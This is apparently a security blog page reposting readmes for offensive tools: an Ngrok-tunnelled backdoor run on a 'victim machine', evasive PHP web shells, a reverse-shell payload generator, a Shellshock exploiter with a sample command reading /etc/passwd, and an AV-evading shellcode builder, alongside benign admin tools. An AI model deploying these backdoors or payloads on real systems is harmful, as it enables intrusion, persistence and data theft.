Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Shell. Show all posts
Showing posts with label Shell. Show all posts

Sunday, August 12, 2018

Grok-backdoor - Backdoor With Ngrok Tunnel Support


Grok-backdoor is a simple python based backdoor, it uses Ngrok tunnel for the communication. Ngrok-backdoor can generate windows, linux and mac binaries using Pyinstaller.

Disclaimer:
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

Dependencies:
  • Python 2.7
  • Pyinstaller 3.21
  • python-pip 9.0.1

Installation :
pip install -r requirements.txt

Usage:
You need to register an acccount in ngrok.com to use this backdoor, provide Ngrok authcode while configuring the grok-backdoor. You will see a new tcp tunnel created in Ngrok status panel after the grok-backdoor server execution in victim machine.
Create backdoor binary by running:
python grok-backdoor.py

Linux:


Windows :



You can find the output binary in grok-backdoor/dist/ directory:


Run grok-backdoor output binary in victim machine and login to Ngrok.com control panel to see the tunnel URL:


Telnet to tunnel URL to get the Bind shell: Enjoy shell :)


Features:
  • Multi platform support(windows,linux,Mac)
  • Autheticated bind shell
  • Ngrok tunnel for communication

Share:

Thursday, September 21, 2017

Advanced Web Shell - DAws


There's multiple things that makes DAws better than every Web Shell out there:
  1. Bypasses Security Systems(IPS, WAFs,etc) like Suhosin(uses up to 20 php functions just to get a command executed).
  2. Drops CGI Shells and communicate with them to bypass Security Systems.
  3. Uses the SSH Authorized Keys method to bypass Security Systems.
  4. Uses Shellshock in 2 methods to bypass Security Systems.
  5. Is completely Post Based and uses a XOR Encryption based on a random key that gets generated with every new session + private base64 functions to bypass Security Systems.
  6. Supports Windows and Linux.
  7. Finds a writeable and readable directory and moves there if it's a web directory; DAws will output everything in that found directory.
  8. Drops a php.ini and a .htaccess file that clears all disablers incase "suphp" was installed.
  9. Has an advanced File Manager.
  10. Everything is done automatically so there's nothing for the user to worry about.
  11. Open Source.
  12. and much more (check the source for more information; everything is well commented)

Credits:


Share:

Sunday, October 16, 2016

Python Client with PHP Shell - tinyshell



python Client with php shell , allows to connect and send commands over current protocol using POST and GET Requests

Features
  1. connect with direct session with no need for reverse connection .
  2. support password protection .
  3. can be binded to any file with no damage .
  4. using GET/POST request with error handling .

Usage
the project contains of two files :
  1. Remote shell python file : considered as Client to connect with target python remote shell.py url password
  2. php shell php file : considered as php backdoor . password can be edited manually by modifing the code .

Credits
Lawrence Amer - Vulnerability Lab Researcher .

Video


Share:

Saturday, April 30, 2016

An interactive reference tool to help security professionals utilize useful payloads and commands - Brosec




Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...



Payload Variables


Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).


Available variables
  • LHOST : Local IP or name
  • LPORT : Local IP or name
  • RHOST : Remote IP or name
  • RPORT : Remote IP or name
  • USER : Username (only used in a few payloads)
  • PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.
  • Configuration variables can be viewed via the config command at any time, or by entering the variable name
  • Variables can be changed at any time by entering set <variable> <value>
  • You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
    • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros


In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.



Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).


Installation

Releases
Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec

Manual installation

Mac
  • brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm depdendencies

Kali Linux
  • apt-get install npm build-essential g++ xsel netcat Install dependencies
  • npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
  • npm install -g n Install n (nodejs version manager)
  • n latest Install latest version of nodejs
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm depdendencies

Windows (Unsupported)
  • Install nodejs
  • Install ncat
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc


Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).


Share:

Tuesday, April 5, 2016

A tool to find and exploit servers vulnerable to Shellshock - Shocker



A tool to find and exploit servers vulnerable to Shellshock

Help Text

usage: shocker.py
-h, --help show this help message and exit
--Host HOST, -H HOST A target hostname or IP address
--file FILE, -f FILE File containing a list of targets
--port PORT, -p PORT The target port number (default=80)
--exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a)
--cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
--proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
--ssl, -s Use SSL (default=False)
--threads THREADS, -t THREADS Maximum number of threads (default=10, max=100)
--verbose, -v Be verbose in output

Usage Examples

./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd
./shocker.py -H www.example.com -p 8001 -s
Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit for any found
./shocker.py -f ./hostlist
Scans all hosts listed in the file ./hostlist with the default options

Dependencies

Python 2.7+

Change Log

Changes in version 0.72 (December 2014)
  • Minor corrections to logic and typos
Changes in version 0.71 (December 2014)
  • Added timeout to urllib2.urlopen requests using a global 'TIMEOUT'
Changes in version 0.7 (November 2014)
  • Add interactive 'psuedo console' for further exploitation of a chosen vulnerable server
  • Attemped to clean up output buffering issues by wrapping sys.stdout in a class which flushes on every call to write
  • Added a progress indicator for use in time consuming tasks to reassure non vebose users
Changes in version 0.6 (October 2014)
  • Preventing return codes other than 200 from being considered successes
  • Added ability to specify multiple targets in a file
  • Moved the 'cgi_list' list of scripts to attempt to exploit to a file
  • Fixed some output formatting issues
  • Fixed valid hostname/IP regex to allow single word hostnames
Changes in version 0.5 (October 2014)
  • Added ability to specify a single script to target rather than using cgi_list
  • Introduced a timeout on socket operations for host_check
  • Added some usage examples in the script header
  • Added an epilogue to the help text indicating presence of examples
Changes in version 0.4 (October 2014)
  • Introduced a thread count limit defaulting to 10
  • Removed colour support until I can figure out how to make it work in Windows and *nix equally well
  • Spelling corrections
  • More comprehensive cgi_list
  • Removes success_flag from output
Pre 0.4 (October 2014)
  • No idea

TODO
  • Identify and respond correctly to HTTP/200 response - false positives - Low priority/hassle
  • Implement curses for *nix systems - For the whole application or only psuedo terminal? - Low priority/prettiness
  • Thread the initial host check now that multiple targets are supported (and could be make this bit time consuming)
  • Change verbose to integer value - quiet, normal, verbose, debug?
  • Add option to skip initial host checks for the sake of speed?
  • Add a summary of results before exiting
  • Save results to a file? Format?
  • Eventually the idea is to include multiple possible vectors but currently only one is checked.
  • Add Windows and *nix colour support - Low priority/prettiness
  • Add a timeout in interactive mode for commands which don't return, e.g. /bin/cat /dev/zero
  • Prettify - Low priority/pretinness (obviously)
  • Add support for scanning and explointing SSH and SMTP? https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
  • Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Rober Picard
  • Other stuff. Probably.


Share:

Sunday, February 21, 2016

Metasploit Shellcode Generator / Compiler / Listenner - Venom



The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) "the python funtion will execute the shellcode in ram" and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).

'shellcode generator' tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc.."P.S. some payloads are undetectable by AV soluctions yes!!!" one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

optionbuildtargetformatoutput
1shellcodeunixCC
2shellcodewindowsCDLL
3shellcodewindowsDLLDLL
4shellcodewindowsCPYTHON/EXE
5shellcodewindowsCEXE
6shellcodewindowsMSIEXECMSI
7shellcodewindowsCRUBY
8shellcodewindowsPOWERSHELLBAT
9shellcodewindowsHTA-PSHHTA
10shellcodewindowsPSH-CMDPS1
11shellcodewindowsPSH-CMDBAT
12shellcodewebserverPHPPHP
13shellcodemulti OSPYTHON(base64)PYTHON


Share:

Tuesday, February 2, 2016

Perl Brik Platform - Metabrik



Smartphones have their apps, Web browsers have their apps, shells don’t. With Metabrik, we tried to merge the power of shells with the power of the Perl language by creating a platform allowing to quickly write reusable Briks.

Metabrik goals:

ºGlue the Perl language with a shell
ºGive a standardised API to write reusable Briks
ºSelf-documented Briks to make them easy to use
ºOnly 4 main shell commands to remember: use, set, get, run

Metabrik features:

ºCompletion on Brik names, Commands and Attributes
ºCompletion on file manipulation
ºCompletion on Perl variable names
ºCommand history and recalling
ºCustomization support with a .rc file
ºScripting support
ºMultiple Brik repositories support

Metabrik helps you to concentrate on scenarios instead of wasting your time searching how to use a program. You just have to reuse available Briks to perform your everyday job.

The two main ideas behind Metabrik are:

ºYou have the brain, code has the details
ºDo it once

    Share:

    Monday, January 4, 2016

    KeyBox - A web-based SSH console that centrally manages administrative access to systems




    KeyBox is a web-based SSH console that centrally manages administrative access to systems. Web-based administration is combined with management and distribution of user's public SSH keys. Key management and administration is based on profiles assigned to defined users.

    Administrators can login using two-factor authentication with FreeOTP or Google Authenticator. From there they can manage their public SSH keys or connect to their systems through a web-shell. Commands can be shared across shells to make patching easier and eliminate redundant command execution.

    KeyBox layers TLS/SSL on top of SSH and acts as a bastion host for administration. Protocols are stacked (TLS/SSL + SSH) so infrastructure cannot be exposed through tunneling / port forwarding. More details can be found in the following whitepaper: The Security Implications of SSH. Also, SSH key management is enabled by default to prevent unmanaged public keys and enforce best practices.

    Prerequisites

    To Run Bundled with Jetty

    If you're not big on the idea of building from source...
    Download keybox-jetty-vXX.XX.tar.gz
    https://github.com/skavanagh/KeyBox/releases
    Export environment variables
    for Linux/Unix/OSX
     export JAVA_HOME=/path/to/jdk
    export PATH=$JAVA_HOME/bin:$PATH

    for Windows
     set JAVA_HOME=C:\path\to\jdk
    set PATH=%JAVA_HOME%\bin;%PATH%

    Start KeyBox
    for Linux/Unix/OSX
        ./startKeyBox.sh
    for Windows
        startKeyBox.bat
    How to Configure SSL in Jetty (it is a good idea to add or generate your own unique certificate)
    http://wiki.eclipse.org/Jetty/Howto/Configure_SSL

    Using KeyBox

    Open browser to https://<whatever ip>:8443
    Login with
    username:admin
    password:changeme

    Steps:
    1. Create systems
    2. Create profiles
    3. Assign systems to profile
    4. Assign profiles to users
    5. Users can login to create sessions on assigned systems
    6. Start a composite SSH session or create and execute a script across multiple sessions
    7. Add additional public keys to systems
    8. Disable any adminstrative public key forcing key rotation.
    9. Audit session history

    Share:
    Copyright © Offensive Sec Blog | Powered by OffensiveSec
    Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition